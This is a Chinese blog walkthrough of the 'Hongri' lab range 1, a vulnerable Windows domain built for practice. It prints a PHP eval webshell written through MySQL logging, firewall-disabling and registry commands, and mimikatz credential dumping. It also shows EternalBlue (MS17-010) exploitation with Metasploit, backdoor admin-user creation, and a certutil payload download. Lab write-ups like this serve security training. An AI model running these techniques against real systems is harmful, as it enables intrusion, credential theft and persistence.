红日靶场1

Catherines7

已于 2024-04-24 16:47:15 修改

阅读量777

点赞数 24

分类专栏：安全文章标签：安全

于 2024-04-24 16:46:52 首次发布

本文链接：https://blog.csdn.net/CQ17743254852/article/details/138152267

版权

安全专栏收录该内容

27 篇文章 0 订阅

订阅专栏

靶场环境

攻击机：kali(单网卡，NAT)

web服务器：Windows7(双网卡，NAT和host)

域成员：Windows server 2003(单网卡，host)

域控：Windows server 2008 R2(单网卡，host)

靶场搭建这里就不多说了，VMware直接打开即可，注意Windows7要多加一张网卡，将VM1网卡网段设置为192.168.52.0/24，因为服务器默认的网段是52

Web部分

先nmap扫一波

发现80端口和3306

目录扫描

访问Windows7的80端口，出现phpStudy，直接上目录扫描，这里用kali的dirb

dirb http://192.168.239.143

发现phpmyadmin，先上默认弱口令root:root，成功进入后台

MySQLgetshell

然后就是最熟悉的MySQL getshell，先看看有没有文件写入的权限

没有那就通过日志getshell，网站绝对路径在phpstudy探针中可以看得到

show variables like '%general%'; 
set global general_log = on;
set global general_log_file = 'C:/phpStudy/WWW/2.php'; 
select '<?php eval($_POST[pass]);?>';
set global general_log_file='/xxx/xxxx' #将日志路径设置回原来的路径
set global general_log = off;

写入后哥斯拉连接

内网部分

拿到shell之后，把会话给到msf或cs，进行后渗透，用msf或cs生成木马，上传到服务器，然后运行得到会话

先getsystem提权，这里因为是Windows7，提权很容易，实战环境可能在这里就over了

关闭防火墙

netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

提权成功后先迁移进程，免得会话死掉，然后hashdump，上mimikatz抓密码

load kiwi
creds_all

探测域情况

net time /domain                             #查看时间服务器
net user /domain                             #查看域用户
net view /domain                             #查看有几个域
net view /domain:GOD                         #查看GOD域情况
nslookup  主机名	 		                 #查看域内其他主机  可能ip查不出来
net group "domain computers" /domain         #查看域内所有的主机名
net group "domain admins"   /domain          #查看域管理员
net group "domain controllers" /domain       #查看域控

ipconfig后发现域god.org，域控是OWA，ping god.org，dns服务器是138，那么域控IP很有可能是138

添加路由，socks代理

修改/etc/proxychains.conf socks5 127.0.0.1 10040

主机探测

探测内网存活主机，这里用msf的windows/gather/arp_scanner模块

横向移动

winserver 2003

既然抓到了管理员密码，那可以用ipc横向，但是这里因为管理员密码不同，横向不了

fscan扫141（注意这里用fscan扫的时候，会话可能会死，扫完重新起会话）

发现永恒之蓝可以利用

search ms17_010
use 2
set rhost 192.168.52.141
run

那思路就很多了，可以添加管理员组用户，开启3389端口，放行3389端口，rdp登录

set command net user xiaoc 1qaz@WSX /add              #添加用户
run 
set command net localgroup administrators xiaoc /add  #管理员权限
run 
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'     #开启3389端口
run

set command netsh advfirewall set allprofiles state off #关闭防火墙
run

但是这里不知道为啥会超时，3389开了，防火墙关不掉，关闭防火墙命令报错，说命令不存在，很奇怪

也可以把正向连接的木马上传到Windows7上，通过IPC复制或者远程下载到winserver2003，执行上线等等

很奇怪的是certutil.exe在2003上用不了

certutil.exe -urlcache -split -f http://192.168.52.128:80/bind.exe bind.exe

IPC也建立不起来，用户和密码都是对的

无语了，最后想到可以用rdesktop先登录到win7，然后再用win7登录winserver2003试试，终于成功了

之后把上传到win7的bind木马通过浏览器下载下来，运行上线

然后神奇的是会话无效，用32位64位的都不行

然后想想算了，rdp能进，能执行命令就行了

winserver 2008

fscan扫描

老方法，上ms17_010

思路是把bind木马传到win7上，然后域控去远程下载，执行上线

winserver 2008一次成功

Catherines7

关注

24
点赞
踩
5

收藏

觉得还不错? 一键收藏
3
评论
红日靶场1

攻击机：kali(单网卡，NAT)web服务器：Windows7(双网卡，NAT和host)域成员：Windows server 2003(单网卡，host)域控：Windows server 2008 R2(单网卡，host)靶场搭建这里就不多说了，VMware直接打开即可，注意Windows7要多加一张网卡，将VM1网卡网段设置为192.168.52.0/24，因为服务器默认的网段是52。
复制链接

扫一扫